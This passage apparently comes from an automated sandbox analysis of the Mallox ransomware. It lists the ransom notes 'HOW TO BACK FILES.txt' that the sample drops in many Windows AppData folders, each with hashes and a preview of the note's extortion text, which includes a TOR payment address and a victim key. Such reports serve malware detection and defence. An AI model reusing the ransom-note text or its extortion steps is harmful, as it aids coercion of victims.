                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.NET.Native.Runtime.2.2_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
